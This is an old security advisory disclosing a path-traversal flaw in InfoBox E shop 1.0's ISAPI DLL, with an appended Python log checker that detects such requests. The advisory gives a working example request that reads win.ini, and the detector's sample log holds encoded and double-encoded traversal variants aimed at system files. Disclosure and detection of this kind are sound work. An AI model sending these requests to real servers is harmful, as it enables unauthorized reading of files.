================================================
== Alex Stanev Security Advisory #3 @12.14.2002 ==
== http://sec.stanev.org ==
================================================

PRODUCT
E shop

VENDOR
InfoBox [http://www.infobox.bg]

VERSIONS AFFECTED
1.0

CLASS
Remote arbitrary file reading

PRODUCT DESCRIPTION
From vendor's web site:
"Ultimate solution for eCommerce, built upon InfoBox WWW Data Base Server."

THE PROBLEM
The core of E shop is infobox.dll, a Windows ISAPI DLL. Its input is not
sanitized, so it is possible to read the contents of a regular file with
the rights of the IIS user.

EXPLOIT
1) Example request:
http://example.com/scripts/infobox.dll?~get_html|new_shop\\..\\..\\..\\winnt/win.ini

PATCH/WORKAROUND
No workaround possible. Next version?

VENDOR STATUS
Informed. No response received.

=========================
== EOF ==
== http://sec.stanev.org ==
=========================
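
Added example, not part of the original advisory and not vendor code: a log check that flags requests to infobox.dll whose query string contains a ".." path component, as in the EXPLOIT request, including percent-encoded and double-encoded forms. The log layout, field order, addresses and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines. Assumed field order (simplified W3C style):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""
2002-12-14 10:01:02 192.0.2.10 GET /scripts/infobox.dll ~get_html|new_shop\\index.htm 200
2002-12-14 10:01:09 192.0.2.77 GET /scripts/infobox.dll ~get_html|new_shop\\..\\..\\..\\winnt/win.ini 200
2002-12-14 10:02:30 192.0.2.77 GET /scripts/infobox.dll ~get_html|new_shop%5c..%5c..%5cwinnt%2fwin.ini 200
2002-12-14 10:03:11 192.0.2.77 GET /scripts/infobox.dll ~get_html|new_shop%255c..%255c..%255cboot.ini 404
2002-12-14 10:04:00 192.0.2.10 GET /index.html - 200
""".strip()

# A ".." that forms a whole path component: preceded by a separator (or the
# "|" argument delimiter seen in the advisory's request) and followed by one.
TRAVERSAL = re.compile(r"(^|[\\/|])\.\.([\\/]|$)")

def fully_decode(value, max_rounds=3):
    # Undo repeated percent-encoding so %5c and %255c both end up as a backslash.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal(log_text, target="infobox.dll"):
    """Return one record per request to `target` whose query climbs directories."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip W3C header lines and short/garbled records
        date, time, ip, _method, stem, query, status = fields[:7]
        if not stem.lower().endswith("/" + target):
            continue
        decoded = fully_decode(query)
        if TRAVERSAL.search(decoded):
            # A 200 status suggests the file content was actually returned.
            hits.append({"when": f"{date} {time}", "ip": ip,
                         "query": decoded, "served": status == "200"})
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

Requests flagged with served set to True are the ones to review first, since the server answered them with a 200.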